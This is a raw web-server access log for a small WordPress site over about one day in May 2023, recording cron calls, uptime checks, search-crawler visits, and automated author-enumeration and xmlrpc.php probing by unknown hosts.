80.249.163.145 - - [16/May/2023:19:30:39 +0200] "POST /wp-cron.php?doing_wp_cron=1684258239.3281159400939941406250 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684258239.3281159400939941406250" "WordPress/5.3.14; http://sobarlang-terapia.hu"
212.237.51.151 - - [16/May/2023:20:09:15 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
49.12.13.109 - - [16/May/2023:20:59:55 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [16/May/2023:20:59:59 +0200] "POST /wp-cron.php?doing_wp_cron=1684263599.0486500263214111328125 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684263599.0486500263214111328125" "WordPress/5.3.14; http://sobarlang-terapia.hu"
212.237.51.151 - - [16/May/2023:21:37:32 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
80.249.163.145 - - [16/May/2023:21:37:47 +0200] "POST /wp-admin/upgrade.php?step=upgrade_db HTTP/1.1" 200 21 "http://sobarlang-terapia.hu/wp-admin/upgrade.php?step=upgrade_db" "WordPress/5.3.14; http://sobarlang-terapia.hu"
80.249.163.145 - - [16/May/2023:21:37:35 +0200] "POST /wp-cron.php?doing_wp_cron=1684265854.8606801033020019531250 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684265854.8606801033020019531250" "WordPress/5.3.14; http://sobarlang-terapia.hu"
212.237.51.151 - - [16/May/2023:22:16:34 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
49.12.13.109 - - [16/May/2023:23:11:35 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [16/May/2023:23:11:38 +0200] "POST /wp-cron.php?doing_wp_cron=1684271498.0238800048828125000000 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684271498.0238800048828125000000" "WordPress/5.3.15; http://sobarlang-terapia.hu"
95.214.26.15 - - [16/May/2023:23:57:06 +0200] "GET /wp-content/themes/hello-element/footer.php HTTP/1.1" 404 17966 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
80.249.163.145 - - [16/May/2023:23:57:06 +0200] "POST /wp-cron.php?doing_wp_cron=1684274226.8407530784606933593750 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684274226.8407530784606933593750" "WordPress/5.3.15; http://sobarlang-terapia.hu"
49.12.13.109 - - [17/May/2023:00:10:42 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [17/May/2023:00:10:43 +0200] "POST /wp-cron.php?doing_wp_cron=1684275043.5337960720062255859375 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684275043.5337960720062255859375" "WordPress/5.3.15; http://sobarlang-terapia.hu"
49.12.13.109 - - [17/May/2023:01:09:59 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [17/May/2023:01:10:01 +0200] "POST /wp-cron.php?doing_wp_cron=1684278601.3804669380187988281250 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684278601.3804669380187988281250" "WordPress/5.3.15; http://sobarlang-terapia.hu"
88.99.238.79 - - [17/May/2023:01:18:15 +0200] "GET /ads.txt HTTP/1.0" 404 52285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0"
171.25.229.166 - - [17/May/2023:01:32:24 +0200] "GET /?author=21 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
80.249.163.145 - - [17/May/2023:01:32:24 +0200] "POST /wp-cron.php?doing_wp_cron=1684279944.8046538829803466796875 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684279944.8046538829803466796875" "WordPress/5.3.15; http://sobarlang-terapia.hu"
171.25.229.166 - - [17/May/2023:01:32:25 +0200] "GET /?author=21 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
171.25.229.166 - - [17/May/2023:01:32:26 +0200] "GET /?author=22 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
171.25.229.166 - - [17/May/2023:01:32:27 +0200] "GET /?author=23 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
171.25.229.166 - - [17/May/2023:01:32:28 +0200] "GET /?author=24 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
171.25.229.166 - - [17/May/2023:01:32:29 +0200] "GET /?author=25 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
171.25.229.166 - - [17/May/2023:01:32:29 +0200] "GET /?author=26 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
171.25.229.166 - - [17/May/2023:01:32:30 +0200] "GET /?author=27 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
171.25.229.166 - - [17/May/2023:01:32:31 +0200] "GET /?author=28 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
171.25.229.166 - - [17/May/2023:01:32:32 +0200] "GET /?author=29 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
171.25.229.166 - - [17/May/2023:01:32:32 +0200] "GET /?author=30 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
173.247.244.7 - - [17/May/2023:01:33:01 +0200] "GET /?author=71 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0"
173.247.244.7 - - [17/May/2023:01:33:03 +0200] "GET /?author=71 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0"
173.247.244.7 - - [17/May/2023:01:33:04 +0200] "GET /?author=72 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0"
173.247.244.7 - - [17/May/2023:01:33:06 +0200] "GET /?author=73 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0"
173.247.244.7 - - [17/May/2023:01:33:07 +0200] "GET /?author=74 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0"
173.247.244.7 - - [17/May/2023:01:33:09 +0200] "GET /?author=75 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0"
173.247.244.7 - - [17/May/2023:01:33:10 +0200] "GET /?author=76 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0"
173.247.244.7 - - [17/May/2023:01:33:11 +0200] "GET /?author=77 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0"
173.247.244.7 - - [17/May/2023:01:33:12 +0200] "GET /?author=78 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0"
173.247.244.7 - - [17/May/2023:01:33:14 +0200] "GET /?author=79 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0"
173.247.244.7 - - [17/May/2023:01:33:15 +0200] "GET /?author=80 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0"
139.59.95.236 - - [17/May/2023:01:33:32 +0200] "GET /?author=91 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0"
139.59.95.236 - - [17/May/2023:01:33:33 +0200] "GET /?author=91 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0"
139.59.95.236 - - [17/May/2023:01:33:34 +0200] "GET /?author=92 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0"
139.59.95.236 - - [17/May/2023:01:33:35 +0200] "GET /?author=93 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0"
139.59.95.236 - - [17/May/2023:01:33:36 +0200] "GET /?author=94 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0"
139.59.95.236 - - [17/May/2023:01:33:37 +0200] "GET /?author=95 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0"
139.59.95.236 - - [17/May/2023:01:33:38 +0200] "GET /?author=96 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0"
139.59.95.236 - - [17/May/2023:01:33:39 +0200] "GET /?author=97 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0"
139.59.95.236 - - [17/May/2023:01:33:40 +0200] "GET /?author=98 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0"
139.59.95.236 - - [17/May/2023:01:33:41 +0200] "GET /?author=99 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0"
139.59.95.236 - - [17/May/2023:01:33:42 +0200] "GET /?author=100 HTTP/1.1" 404 52289 "-" "Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0"
165.22.113.4 - - [17/May/2023:01:33:43 +0200] "GET /?author=1 HTTP/1.1" 200 53018 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
165.22.113.4 - - [17/May/2023:01:33:44 +0200] "GET /?author=1 HTTP/1.1" 200 53018 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
165.22.113.4 - - [17/May/2023:01:33:45 +0200] "GET /?author=2 HTTP/1.1" 404 52287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
165.22.113.4 - - [17/May/2023:01:33:45 +0200] "GET /?author=3 HTTP/1.1" 404 52287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
165.22.113.4 - - [17/May/2023:01:33:46 +0200] "GET /?author=4 HTTP/1.1" 404 52287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
165.22.113.4 - - [17/May/2023:01:33:47 +0200] "GET /?author=5 HTTP/1.1" 404 52287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
165.22.113.4 - - [17/May/2023:01:33:48 +0200] "GET /?author=6 HTTP/1.1" 404 52287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
165.22.113.4 - - [17/May/2023:01:33:48 +0200] "GET /?author=7 HTTP/1.1" 404 52287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
165.22.113.4 - - [17/May/2023:01:33:49 +0200] "GET /?author=8 HTTP/1.1" 404 52287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
165.22.113.4 - - [17/May/2023:01:33:50 +0200] "GET /?author=9 HTTP/1.1" 404 52287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
185.2.4.127 - - [17/May/2023:01:33:50 +0200] "GET /?author=61 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
165.22.113.4 - - [17/May/2023:01:33:51 +0200] "GET /?author=10 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
185.2.4.127 - - [17/May/2023:01:33:51 +0200] "GET /?author=61 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.2.4.127 - - [17/May/2023:01:33:52 +0200] "GET /?author=62 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.2.4.127 - - [17/May/2023:01:33:53 +0200] "GET /?author=63 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.2.4.127 - - [17/May/2023:01:33:54 +0200] "GET /?author=64 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.2.4.127 - - [17/May/2023:01:33:55 +0200] "GET /?author=65 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.2.4.127 - - [17/May/2023:01:33:55 +0200] "GET /?author=66 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.2.4.127 - - [17/May/2023:01:33:56 +0200] "GET /?author=67 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.2.4.127 - - [17/May/2023:01:33:57 +0200] "GET /?author=68 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.2.4.127 - - [17/May/2023:01:33:58 +0200] "GET /?author=69 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.2.4.127 - - [17/May/2023:01:33:59 +0200] "GET /?author=70 HTTP/1.1" 404 52288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
49.12.13.109 - - [17/May/2023:02:08:21 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
34.222.143.35 - - [17/May/2023:02:31:06 +0200] "GET / HTTP/1.1" 200 18011 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
80.249.163.145 - - [17/May/2023:02:31:06 +0200] "POST /wp-cron.php?doing_wp_cron=1684283466.8921980857849121093750 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684283466.8921980857849121093750" "WordPress/5.3.15; http://sobarlang-terapia.hu"
49.12.13.109 - - [17/May/2023:03:00:50 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
212.237.51.151 - - [17/May/2023:03:53:34 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
80.249.163.145 - - [17/May/2023:03:53:35 +0200] "POST /wp-cron.php?doing_wp_cron=1684288415.1246750354766845703125 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684288415.1246750354766845703125" "WordPress/5.3.15; http://sobarlang-terapia.hu"
49.12.13.109 - - [17/May/2023:04:52:44 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [17/May/2023:04:52:44 +0200] "POST /wp-cron.php?doing_wp_cron=1684291964.8433389663696289062500 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684291964.8433389663696289062500" "WordPress/5.3.15; http://sobarlang-terapia.hu"
49.12.13.109 - - [17/May/2023:05:51:49 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [17/May/2023:05:51:50 +0200] "POST /wp-cron.php?doing_wp_cron=1684295510.1176240444183349609375 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684295510.1176240444183349609375" "WordPress/5.3.15; http://sobarlang-terapia.hu"
54.36.148.7 - - [17/May/2023:06:40:00 +0200] "GET /robots.txt HTTP/1.1" 200 114 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
80.249.163.145 - - [17/May/2023:06:40:01 +0200] "POST /wp-cron.php?doing_wp_cron=1684298401.6133549213409423828125 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684298401.6133549213409423828125" "WordPress/5.3.15; http://sobarlang-terapia.hu"
54.36.148.156 - - [17/May/2023:06:40:04 +0200] "GET / HTTP/1.1" 200 18011 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.226 - - [17/May/2023:06:40:08 +0200] "GET /wp-content/themes/twentyseventeen/assets/js/jquery.scrollTo.js?ver=2.1.2 HTTP/1.1" 200 2409 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.15 - - [17/May/2023:06:40:08 +0200] "GET /wp-content/themes/twentyseventeen/style.css?ver=20190507 HTTP/1.1" 200 15806 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.22 - - [17/May/2023:06:40:08 +0200] "GET /wp-content/themes/twentyseventeen/assets/css/blocks.css?ver=20190105 HTTP/1.1" 200 1862 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.125 - - [17/May/2023:06:40:09 +0200] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.3.15 HTTP/1.1" 200 6132 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.145 - - [17/May/2023:06:40:09 +0200] "GET /wp-includes/css/dist/block-library/theme.min.css?ver=5.3.15 HTTP/1.1" 200 639 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.158 - - [17/May/2023:06:40:09 +0200] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4-wp HTTP/1.1" 200 33776 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.5 - - [17/May/2023:06:40:10 +0200] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 4014 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.167 - - [17/May/2023:06:40:10 +0200] "GET /wp-includes/js/wp-embed.min.js?ver=5.3.15 HTTP/1.1" 200 777 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.64 - - [17/May/2023:06:40:10 +0200] "GET /wp-content/themes/twentyseventeen/assets/js/skip-link-focus-fix.js?ver=20161114 HTTP/1.1" 200 416 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.4 - - [17/May/2023:06:40:10 +0200] "GET /wp-content/themes/twentyseventeen/assets/js/global.js?ver=20190121 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
49.12.13.109 - - [17/May/2023:06:47:46 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
49.12.13.109 - - [17/May/2023:07:46:51 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [17/May/2023:07:46:54 +0200] "POST /wp-cron.php?doing_wp_cron=1684302414.4846029281616210937500 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684302414.4846029281616210937500" "WordPress/5.3.15; http://sobarlang-terapia.hu"
40.77.167.221 - - [17/May/2023:08:02:51 +0200] "GET /sitemap.xml HTTP/1.1" 200 494 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
49.12.13.109 - - [17/May/2023:08:43:59 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [17/May/2023:08:44:00 +0200] "POST /wp-cron.php?doing_wp_cron=1684305840.1212520599365234375000 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684305840.1212520599365234375000" "WordPress/5.3.15; http://sobarlang-terapia.hu"
92.204.239.196 - - [17/May/2023:09:00:11 +0200] "POST /xmlrpc.php HTTP/1.1" 200 411 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
92.205.10.94 - - [17/May/2023:09:01:30 +0200] "POST /xmlrpc.php HTTP/1.1" 200 411 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
212.237.51.151 - - [17/May/2023:09:21:59 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
49.12.13.109 - - [17/May/2023:10:16:11 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [17/May/2023:10:16:12 +0200] "POST /wp-cron.php?doing_wp_cron=1684311372.2002279758453369140625 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684311372.2002279758453369140625" "WordPress/5.3.15; http://sobarlang-terapia.hu"
178.250.156.243 - - [17/May/2023:10:59:34 +0200] "POST /xmlrpc.php HTTP/1.1" 200 411 "-" "Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0"
80.249.163.145 - - [17/May/2023:10:59:35 +0200] "POST /wp-cron.php?doing_wp_cron=1684313975.8701479434967041015625 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684313975.8701479434967041015625" "WordPress/5.3.15; http://sobarlang-terapia.hu"
51.91.30.96 - - [17/May/2023:10:59:40 +0200] "POST /xmlrpc.php HTTP/1.1" 200 411 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36"
49.12.13.109 - - [17/May/2023:11:14:13 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
212.237.51.151 - - [17/May/2023:11:59:45 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
80.249.163.145 - - [17/May/2023:11:59:46 +0200] "POST /wp-cron.php?doing_wp_cron=1684317586.3357930183410644531250 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684317586.3357930183410644531250" "WordPress/5.3.15; http://sobarlang-terapia.hu"
217.182.173.145 - - [17/May/2023:12:08:07 +0200] "POST /xmlrpc.php HTTP/1.1" 200 411 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
149.28.29.173 - - [17/May/2023:12:08:26 +0200] "POST /xmlrpc.php HTTP/1.1" 200 411 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
65.154.226.170 - - [17/May/2023:12:08:29 +0200] "GET / HTTP/1.1" 200 18011 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
178.250.156.243 - - [17/May/2023:12:08:49 +0200] "POST /xmlrpc.php HTTP/1.1" 200 411 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
167.235.61.73 - - [17/May/2023:12:08:50 +0200] "POST /xmlrpc.php HTTP/1.1" 200 411 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
212.237.51.151 - - [17/May/2023:12:48:06 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
80.249.163.145 - - [17/May/2023:12:48:07 +0200] "POST /wp-cron.php?doing_wp_cron=1684320487.4818019866943359375000 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684320487.4818019866943359375000" "WordPress/5.3.15; http://sobarlang-terapia.hu"
103.91.210.145 - - [17/May/2023:13:12:23 +0200] "POST /xmlrpc.php HTTP/1.1" 200 411 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36"
104.168.64.244 - - [17/May/2023:13:12:32 +0200] "POST /xmlrpc.php HTTP/1.1" 200 411 "-" "Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36"
94.46.22.120 - - [17/May/2023:13:12:39 +0200] "POST /xmlrpc.php HTTP/1.1" 200 411 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
